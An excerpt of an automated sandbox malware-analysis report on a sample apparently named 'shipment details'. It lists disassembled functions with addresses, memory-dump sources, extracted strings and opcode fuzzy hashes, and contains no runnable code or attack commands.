Function 0133CCD8 Relevance: 2.7, Strings: 2, Instructions: 183
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PH]q, xrefs: 0133CF40
PH]q, xrefs: 0133CF2F

Memory Dump Source

Source File: 00000001.00000002.4519780428.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1330000_shipment details.jbxd

Similarity

API ID:
String ID: PH]q$PH]q
API String ID: 0-1166926398
Opcode ID: 706bf77accb42c4d973d886ebdad6dd9cc1c08ff18474cba7bdb395e1fd64ecd
Instruction ID: dba97544c6d69e85d6b4e12037844f78e98f2b87acf0f7f63792e538021bc1c2
Opcode Fuzzy Hash: 706bf77accb42c4d973d886ebdad6dd9cc1c08ff18474cba7bdb395e1fd64ecd
Instruction Fuzzy Hash: 9D81C374E00218CFDB18DFAAD984A9DBBF2BF88304F14D06AE409AB365DB349945CF54

Function 0133CFAA Relevance: 2.7, Strings: 2, Instructions: 182COMMON

Download Yara Rule

Strings

PH]q, xrefs: 0133D210
PH]q, xrefs: 0133D1FF

Memory Dump Source

Source File: 00000001.00000002.4519780428.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1330000_shipment details.jbxd

Similarity

API ID:
String ID: PH]q$PH]q
API String ID: 0-1166926398
Opcode ID: c5144cc4ae955357a3b2ead05c87d6bf66c15975e03e748382d4810dc28448ec
Instruction ID: 8cae3761a17b79e9046c38e2d5dead516e6d57defb75005e6aa777a493cab75b
Opcode Fuzzy Hash: c5144cc4ae955357a3b2ead05c87d6bf66c15975e03e748382d4810dc28448ec
Instruction Fuzzy Hash: 7281C274E00218CFDB58DFAAD984A9DBBF2BF88304F14C069E419AB365DB349945CF54

Function 06BD9548 Relevance: 1.9, APIs: 1, Instructions: 357COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4529301009.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bd0000_shipment details.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 294abce766c304d43c035d548c6d27268b4940a991ad3606efa63f4e33cdd10a
Instruction ID: dab893626315c3bef5ad44052d0c133fc039cc352037e306620d047688be5da8
Opcode Fuzzy Hash: 294abce766c304d43c035d548c6d27268b4940a991ad3606efa63f4e33cdd10a
Instruction Fuzzy Hash: D3F1F6B4D01218CFDB54DFA9D884B9DBBB2BF88304F54C1A9E408AB355EB719985CF50

Function 06BD0B30 Relevance: .7, Instructions: 709COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4529301009.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bd0000_shipment details.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32b94400a975501df7ad775cdd38e352d5e59554949b31e31cd37be9bffa192e
Instruction ID: ac8f663c61f23c6ff54df446cc91fc7ec8df3b237470b48ec6e50230d7feb127
Opcode Fuzzy Hash: 32b94400a975501df7ad775cdd38e352d5e59554949b31e31cd37be9bffa192e
Instruction Fuzzy Hash: 3572CEB4E012298FDB65DF69C980BDDBBB2BB49304F1491E9D409AB355EB309E81CF40

Function 06BD2968 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4529301009.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bd0000_shipment details.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b2b31a5ba41fb2d5cdd44b01b15c5e00dcd5e15425e3c8940db0c11f46326d7
Instruction ID: a20279904e48eca4f52c4f971410ecedd342e580daf0bcfb3767727d00681fee
Opcode Fuzzy Hash: 8b2b31a5ba41fb2d5cdd44b01b15c5e00dcd5e15425e3c8940db0c11f46326d7
Instruction Fuzzy Hash: EDC19F78E01218CFDB54DFA5D944B9DBBB2BF88304F1081A9E809AB365DB359E85CF50

Function 06BD2DC8 Relevance: .2, Instructions: 220COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4529301009.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bd0000_shipment details.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c7b5770f5b5e98267fcacd435d830f7f64584359851e3d6374b3442b7843db1
Instruction ID: b1da9dbf19ad12e7a7c84d138ba1acaf2730c1c65db1029f4ab4ef0f3dafa52d
Opcode Fuzzy Hash: 7c7b5770f5b5e98267fcacd435d830f7f64584359851e3d6374b3442b7843db1
Instruction Fuzzy Hash: B8A10570D00208CFEB14DFA9C944BDDBBB1FF89304F209669E508AB2A2DB749985CF55

Function 06BD2DC2 Relevance: .2, Instructions: 216COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4529301009.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bd0000_shipment details.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: acebefd2d3a0232f8809d68d9a1b3f66cd097ae038d620992f5c1960da2125fe
Instruction ID: eb33818a2425a2ede47f51e0c9a10b492a427098ec2e0ab3fcca7a6dc34f804d
Opcode Fuzzy Hash: acebefd2d3a0232f8809d68d9a1b3f66cd097ae038d620992f5c1960da2125fe
Instruction Fuzzy Hash: 02A10674D002088FEB14DFA9C944BDDBBB1FF88304F209669E509AB2A2DB749985CF55

Function 06BD310E Relevance: .2, Instructions: 202COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4529301009.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bd0000_shipment details.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 017be464e863805ea8a7b758537d5106bb4378c7ef4cac3d1ccbbc6327e01fbb
Instruction ID: 895b6e6c993683ae2f308aa4f09f97bbea55c0aec169d4857b374972a9ea181f
Opcode Fuzzy Hash: 017be464e863805ea8a7b758537d5106bb4378c7ef4cac3d1ccbbc6327e01fbb
Instruction Fuzzy Hash: 85910674D00219CFEB50DFA8C844BDCBBB1FF49300F2096A9E509AB292EB749985CF55

Function 0133F2C0 Relevance: .2, Instructions: 150COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4519780428.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1330000_shipment details.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 87c81aef4f866f7531299b1076a2d8e0455e6c38eca4c6adca09aaa245ddb57d
Instruction ID: 1e98afef2c5d9dc8dd841d5465b21f4aa2d3e0cbd839b83af2d98a9a34016d42
Opcode Fuzzy Hash: 87c81aef4f866f7531299b1076a2d8e0455e6c38eca4c6adca09aaa245ddb57d
Instruction Fuzzy Hash: 92515870D01208CBDB04EFA9D5847EDBBB6BB88318FA4C128D404BB295CB759981CB59

Function 0133E97A Relevance: .1, Instructions: 148COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4519780428.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1330000_shipment details.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c0b33d042e15d578fe7af167432527642d74e9b5dafcda88e317b37aae2da770
Instruction ID: 7d63d9ec0515f635d7418a5ca4252d84c1c3007f521ec70e20a15addc6ac6d27
Opcode Fuzzy Hash: c0b33d042e15d578fe7af167432527642d74e9b5dafcda88e317b37aae2da770
Instruction Fuzzy Hash: BD51B574E00218DFDB18DFAAD984A9DBBB6FF88314F24C129E815AB365DB345846CF14

Function 0133E988 Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4519780428.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1330000_shipment details.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6746722da847e949789cc8f56d365a33647dd44075250f7c8ff9fb9b18551af9
Instruction ID: ffe364d0fe97b23e63123e134b4fa7ae5747e340fb045552acda07ebb50a2985
Opcode Fuzzy Hash: 6746722da847e949789cc8f56d365a33647dd44075250f7c8ff9fb9b18551af9
Instruction Fuzzy Hash: 7551B474E00208DFEB18DFAAD594A9DBBB6BF88304F208529E819AB365DB345845CF14

Function 0133F4AC Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4519780428.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1330000_shipment details.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e341893b8bb322b6e9cacdb09476af2a8a4a3868c1c1d6c783555734d60c94a3
Instruction ID: 0165d3eb627ad284d7c7a20a6b3eeadee3f56b077ab537c78acdce9b8b950b33
Opcode Fuzzy Hash: e341893b8bb322b6e9cacdb09476af2a8a4a3868c1c1d6c783555734d60c94a3
Instruction Fuzzy Hash: 04512570D05208CFDB04EFA8D5847EDBBBABB89318FA49129D009BB295C7359981CF59

Function 013376F1 Relevance: 10.5, Strings: 8, Instructions: 472
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(o]q, xrefs: 01337815
(o]q, xrefs: 013377E9
(o]q, xrefs: 0133772E
(o]q, xrefs: 013378B2
(o]q, xrefs: 01337C0F
(o]q, xrefs: 01337BFF
,aq, xrefs: 01337BA0
,aq, xrefs: 01337B90

Memory Dump Source

Source File: 00000001.00000002.4519780428.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1330000_shipment details.jbxd

Similarity

API ID:
String ID: (o]q$(o]q$(o]q$(o]q$(o]q$(o]q$,aq$,aq
API String ID: 0-1435242062
Opcode ID: a852aa6fb40840fceb8e2ece78cc68e61d67452700132fc4ff5da1a935ff59aa
Instruction ID: 7c0a94a7931645e22c53bbba36687bb2afc1e34cbc12c50e14173e3a14891136
Opcode Fuzzy Hash: a852aa6fb40840fceb8e2ece78cc68e61d67452700132fc4ff5da1a935ff59aa
Instruction Fuzzy Hash: 10127970A006098FDB29CF69D984AAEBBF6FF88318F148599E549DB361D730EC41CB54

Function 01335F38 Relevance: 2.8, Strings: 2, Instructions: 265
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Haq, xrefs: 01336056
Haq, xrefs: 01336023

Memory Dump Source

Source File: 00000001.00000002.4519780428.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1330000_shipment details.jbxd

Similarity

API ID:
String ID: Haq$Haq
API String ID: 0-4016896955
Opcode ID: 92c610a6dbec6f0f5d47b260e04b91af8b93d81c275296867f245a6445c0f12e
Instruction ID: 446206a14982181965687597f48f31b693438ff96e19700251d507cd94fc6eb3
Opcode Fuzzy Hash: 92c610a6dbec6f0f5d47b260e04b91af8b93d81c275296867f245a6445c0f12e
Instruction Fuzzy Hash: 0B91CC70704205AFDB159F28C854A6EBBB6BFC8308F148869E946CB396CF74CD46C795

Function 01336498 Relevance: 2.7, Strings: 2, Instructions: 231
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

,aq, xrefs: 01336578
,aq, xrefs: 0133656E

Memory Dump Source

Source File: 00000001.00000002.4519780428.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1330000_shipment details.jbxd

Similarity

API ID:
String ID: ,aq$,aq
API String ID: 0-2990736959
Opcode ID: 93bc0d4d3cc5e053bb0bccd3b13bdabbf6b555ded3cf786d7d0f98dd662dfda8
Instruction ID: fd9f34eca31a1f784af2ecf067667a10a0ec3b0a104ec1162d3972890cc73120
Opcode Fuzzy Hash: 93bc0d4d3cc5e053bb0bccd3b13bdabbf6b555ded3cf786d7d0f98dd662dfda8
Instruction Fuzzy Hash: 6B81E0B0B00509EFDB14CF6DC485A6ABBB6FFC8268B148169D506D73A5DB31E901CB54

Function 01339C30 Relevance: 2.6, Strings: 2, Instructions: 150COMMON

Download Yara Rule

Strings

4']q, xrefs: 01339D6D
4']q, xrefs: 01339D84

Memory Dump Source

Source File: 00000001.00000002.4519780428.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1330000_shipment details.jbxd

Similarity

API ID:
String ID: 4']q$4']q
API String ID: 0-3120983240
Opcode ID: ce5b4a842005a55caa7cb4c14d58f868907994617a9cbbcac5fd6138946c77ce
Instruction ID: 37481df239bbad70566409f5048194dab22373213cf27d9f7c111eea4dc8d3f6
Opcode Fuzzy Hash: ce5b4a842005a55caa7cb4c14d58f868907994617a9cbbcac5fd6138946c77ce
Instruction Fuzzy Hash: 5C518E31700209DFDB05DB6DD884B6ABBEAEBC8318F148466E909CB356DBB5CC01C7A5

Function 0133AEBA Relevance: 2.6, Strings: 2, Instructions: 122COMMON

Download Yara Rule

Strings

(o]q, xrefs: 0133B079
(o]q, xrefs: 0133AECD

Memory Dump Source

Source File: 00000001.00000002.4519780428.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1330000_shipment details.jbxd

Similarity

API ID:
String ID: (o]q$(o]q
API String ID: 0-1858875562
Opcode ID: 48f3bba3660880bcf4da2e45b0d3635c67f8d01cd452127990ac39292038fbc9
Instruction ID: b8f7a5e627035c3834cbee395d3f5d15aaa622999ffaf0713b838e784b627e14
Opcode Fuzzy Hash: 48f3bba3660880bcf4da2e45b0d3635c67f8d01cd452127990ac39292038fbc9
Instruction Fuzzy Hash: FC41E031B402049FC708AB78DC147AEBBE6AFC8605F14486AE606D7395DE349C06C798

Function 01333CB1 Relevance: 2.6, Strings: 2, Instructions: 116COMMON

Download Yara Rule

Strings

Xaq, xrefs: 01333CF6
Xaq, xrefs: 01333CCD

Memory Dump Source

Source File: 00000001.00000002.4519780428.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1330000_shipment details.jbxd

Similarity

API ID:
String ID: Xaq$Xaq
API String ID: 0-1488805882
Opcode ID: b92475ab5d9d386deee8638de457561401c34741c73dd24725084d6ee9b31e37
Instruction ID: 81e107a4c39e4ead6da67d4a85dcc731f48d446b1857fe8d65958b9200424ca9
Opcode Fuzzy Hash: b92475ab5d9d386deee8638de457561401c34741c73dd24725084d6ee9b31e37
Instruction Fuzzy Hash: 09316C31B042694BDF194A7E49A827EAAEABFC4308F18C53DD803C7395DB75CC458359

Function 01338EF8 Relevance: 2.6, Strings: 2, Instructions: 100COMMON

Download Yara Rule

Strings

$]q, xrefs: 01338FB4
$]q, xrefs: 01338FD7

Memory Dump Source

Source File: 00000001.00000002.4519780428.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1330000_shipment details.jbxd

Similarity

API ID:
String ID: $]q$$]q
API String ID: 0-127220927
Opcode ID: 43bbf5cf632adc412fb5c4b168acfebc3bb37268f3f9ba496656b19acfce1b5a
Instruction ID: 6d096dd1453d64d464a006b8b99fa2ec6adb2117bfcf24403af68ba61375f4bd
Opcode Fuzzy Hash: 43bbf5cf632adc412fb5c4b168acfebc3bb37268f3f9ba496656b19acfce1b5a
Instruction Fuzzy Hash: 4E31B4303541018FDB2A9B2DEC5067E7B6BFFC4708B140A96F212CB392DA28CC448759

Function 01330C8F Relevance: 1.8, Strings: 1, Instructions: 545COMMON

Download Yara Rule

Strings

LR]q, xrefs: 01330F19

Memory Dump Source

Source File: 00000001.00000002.4519780428.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1330000_shipment details.jbxd

Similarity

API ID:
String ID: LR]q
API String ID: 0-3081347316
Opcode ID: 941ca05f5f541bbac77fc5f5e71ad36e42946026bf4f3da3ec44ce53d3aaf25a
Instruction ID: 8f4813f9b71fb05da1151c7aa0ceb59bd4d65b687967dcdcf3936ed50cc5cf57
Opcode Fuzzy Hash: 941ca05f5f541bbac77fc5f5e71ad36e42946026bf4f3da3ec44ce53d3aaf25a
Instruction Fuzzy Hash: 5152E875E01219CFCB54EF68EA98B9DBBB2FB49301F1085A9D409A7358DB705E85CF80

Function 01330CA0 Relevance: 1.8, Strings: 1, Instructions: 539COMMON

Download Yara Rule

Strings

LR]q, xrefs: 01330F19

Memory Dump Source

Source File: 00000001.00000002.4519780428.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1330000_shipment details.jbxd

Similarity

API ID:
String ID: LR]q
API String ID: 0-3081347316
Opcode ID: 18912103d1d6776de9a5a8342a1f8e53e786632848893866aa3ce98db3777459
Instruction ID: 550c9ad57fd81093d9a418de36f734dea47e8f8826cda46a0ae108c0011120aa
Opcode Fuzzy Hash: 18912103d1d6776de9a5a8342a1f8e53e786632848893866aa3ce98db3777459
Instruction Fuzzy Hash: 6152E875E01219CFCB54EF68EA98A9DBBB2FB49301F1085A9D409A7358DB705E85CF80

Function 06BD992C Relevance: 1.6, APIs: 1, Instructions: 62libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(00000000), ref: 06BD9A6E

Memory Dump Source

Source File: 00000001.00000002.4529301009.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bd0000_shipment details.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 90af4ee129571b6a79fcb1dd50ec02119d958f89f409bf64c86c0d31dc9d3989
Instruction ID: 1faf3958bd1d88a7c861445306b2400eaa8edddbff09b700a41d361ce5a5ef5c
Opcode Fuzzy Hash: 90af4ee129571b6a79fcb1dd50ec02119d958f89f409bf64c86c0d31dc9d3989
Instruction Fuzzy Hash: 43114FB5E011099FDB44EFA8D484AEDBBB5FF88315F5481A5E804EB246E730D941CB50

Function 0133E007 Relevance: .6, Instructions: 650COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4519780428.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1330000_shipment details.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d5e7e2734613dfadbe11401afeac58ce73fa556af38089ced0b843559af60e8
Instruction ID: e48d9cba713f228af0a70e010363356d0e398dc3b36061f1371b02d29dc64404
Opcode Fuzzy Hash: 3d5e7e2734613dfadbe11401afeac58ce73fa556af38089ced0b843559af60e8
Instruction Fuzzy Hash: 8A12A9758B12529FE2513F21E9AC13EBB61FB5F723794AD40F10FC0A45AB7058688F62

Function 0133E018 Relevance: .6, Instructions: 647COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4519780428.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1330000_shipment details.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a5917b8c26e8eead16f35ec8fd3f5492c8314e1c61ce8d367196f70d6995f421
Instruction ID: 67f35b386a149f50f54ed6bdb36fc7e351eda0d44c641f038a3558e5fd0a5b22
Opcode Fuzzy Hash: a5917b8c26e8eead16f35ec8fd3f5492c8314e1c61ce8d367196f70d6995f421
Instruction Fuzzy Hash: 411299758B12529FE2513F21E9AC13EBB61FB5F727790AD40F10FC0A45AB7058688F62

Function 01339A10 Relevance: .2, Instructions: 231COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4519780428.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1330000_shipment details.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ec3a8b1a8d968d051554de9e0c4afe4870f524ebd6bb822df2276abc391ff9d
Instruction ID: 0bf15a525e00a1b6ec063948a212ead0ce7cbe37d19b7d50a75b2a734dc45ec6
Opcode Fuzzy Hash: 5ec3a8b1a8d968d051554de9e0c4afe4870f524ebd6bb822df2276abc391ff9d
Instruction Fuzzy Hash: 3A81F331900605DFCB15CF2CC884AAABBFAEFC5328B54C666D95997352C331E812CBA4

Function 013380D8 Relevance: .2, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4519780428.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1330000_shipment details.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc74156f7cbe33ccf677c46ce39bf571907e529e1cfdd56913f00f69cd6f98a4
Instruction ID: 3c98fd0413b862f01c40e7abfbb3028f0a8359218d7b051cbc64e2a407108aef
Opcode Fuzzy Hash: fc74156f7cbe33ccf677c46ce39bf571907e529e1cfdd56913f00f69cd6f98a4
Instruction Fuzzy Hash: 6A7148347006098FDB15DF6CC898AAE7BE6AF89208B1506E9F916DB3B1DB70DC41CB54

Function 0133F71F Relevance: .2, Instructions: 154COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4519780428.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1330000_shipment details.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7087bfc372cedc44ec43bcebe898ac450c13629e2be2a6d24704c5f80835669c
Instruction ID: 91bb0f6c4fbcc7e66b74009d06dc535e732df5701d96c9ab53fa9cc60220fd5f
Opcode Fuzzy Hash: 7087bfc372cedc44ec43bcebe898ac450c13629e2be2a6d24704c5f80835669c
Instruction Fuzzy Hash: AE512370D01218DFDB14DFA5E948AAEBBB6FF88304F208529D809AB365DB355946CF41

Function 0133D548 Relevance: .1, Instructions: 138COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4519780428.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1330000_shipment details.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8855a664e691dd2971ca1c889501b7590996eefbc23df1a9bdeba8e50d4c1e1
Instruction ID: 30f9271369128d9f9cab2dfcf6f61da6dd1926b8919b77f91baeb0da447a3906
Opcode Fuzzy Hash: e8855a664e691dd2971ca1c889501b7590996eefbc23df1a9bdeba8e50d4c1e1
Instruction Fuzzy Hash: CE519274E01208DFDB58DFAAD58499DBBF2FF89310F248169E819AB365DB31A801CF40

Function 013341A0 Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4519780428.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1330000_shipment details.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30413c98157c02d64d82f9c66edd848b74aa5c98db40e12c299bef0f1270d768
Instruction ID: eecef943d4c79c805055341eebefafb7e7a81d95e60f46f0be41b53689d067dd
Opcode Fuzzy Hash: 30413c98157c02d64d82f9c66edd848b74aa5c98db40e12c299bef0f1270d768
Instruction Fuzzy Hash: 2551A875E01608CFCB48DFA9D58499DBBF2FF89315B208469E809AB364DB31A942CF54

Function 0133A303 Relevance: .1, Instructions: 122COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4519780428.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1330000_shipment details.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 68f0895c59e214e1ecbaa3cdc5bb7436a49b190aac75c7dd7e2eb1b2d9a27266
Instruction ID: 4061769c119ecd59a8c03358ca1a2a49022b37f36351fd1083c3b6765c8338eb
Opcode Fuzzy Hash: 68f0895c59e214e1ecbaa3cdc5bb7436a49b190aac75c7dd7e2eb1b2d9a27266
Instruction Fuzzy Hash: B5419031A04249DFCF12CFA8C844A9EBFB2AF85328F048555E995EB362D375E914CB54

Function 01336FC8 Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4519780428.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1330000_shipment details.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e36cb35ce2b59c67260b4445ad32b9506defacbf32b36596423eca736fb9bdfa
Instruction ID: 4b31cd550fc3f4bedd90140dd54f96a5a1930b3abf283e3e97d0f3bc73517951
Opcode Fuzzy Hash: e36cb35ce2b59c67260b4445ad32b9506defacbf32b36596423eca736fb9bdfa
Instruction Fuzzy Hash: F541F271A042499FCB11DF68C804BAAFBF6FB84308F04846AE915DB252D775DD45CBA1

Function 01335658 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4519780428.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1330000_shipment details.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 45785d4d6bedee36a866de7907a2d6198a8e61161a6b59ca2000d490c68d4162
Instruction ID: 290baa171de6e343837fc7992b5e07bd911123f5c247c1fcff3dcc5dda6c3ef2
Opcode Fuzzy Hash: 45785d4d6bedee36a866de7907a2d6198a8e61161a6b59ca2000d490c68d4162
Instruction Fuzzy Hash: 8531A33160520AEFCF02AF64E854AAF7BB6FB88615F008419FA15C7394CB35CD61DB90

Function 01338380 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4519780428.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1330000_shipment details.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d1f4a6e3dfd6876ad8ff77bca745d81f5c7d3ab10404cc4b4a804a146993f3b8
Instruction ID: 07e761f976d9fb764b4861bfb9e11caa6cb634ba5bc2b55cb78137d2201101d5
Opcode Fuzzy Hash: d1f4a6e3dfd6876ad8ff77bca745d81f5c7d3ab10404cc4b4a804a146993f3b8
Instruction Fuzzy Hash: 6721F2713002008BDB265B29C95463E768BAFC470CF1486BDF506EBBA9EE79CC42D385

Function 013362F0 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4519780428.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1330000_shipment details.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cea2831270ff99b77c21f05f77b381cbc6aab1ab8b0c78864fdec59a15153272
Instruction ID: dc714258a18c86200a271070e2b359861e1f7d9861c352d85a4d88b464925e24
Opcode Fuzzy Hash: cea2831270ff99b77c21f05f77b381cbc6aab1ab8b0c78864fdec59a15153272
Instruction Fuzzy Hash: 742138367045119FC7259B29D85853EBBA2FFC6769718856EE906CB7A4CF30CC02CB84

Function 013328F0 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4519780428.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1330000_shipment details.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e75eeef443c1fec2d676f6dd78d7e856d25cb71aae8f8e8b46549a1c7e227197
Instruction ID: 58ae2776738d778f4b0431449b8f77407976d1c92b7f540990f7f64187240d3c
Opcode Fuzzy Hash: e75eeef443c1fec2d676f6dd78d7e856d25cb71aae8f8e8b46549a1c7e227197
Instruction Fuzzy Hash: 3D21AF35A001199FCB15DF68D8409AF77A5EBDD3A8B20C419E80A9B340DB34EA47CBD2

Function 012DD006 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4519278354.00000000012DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012DD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_12dd000_shipment details.jbxd

Similarity

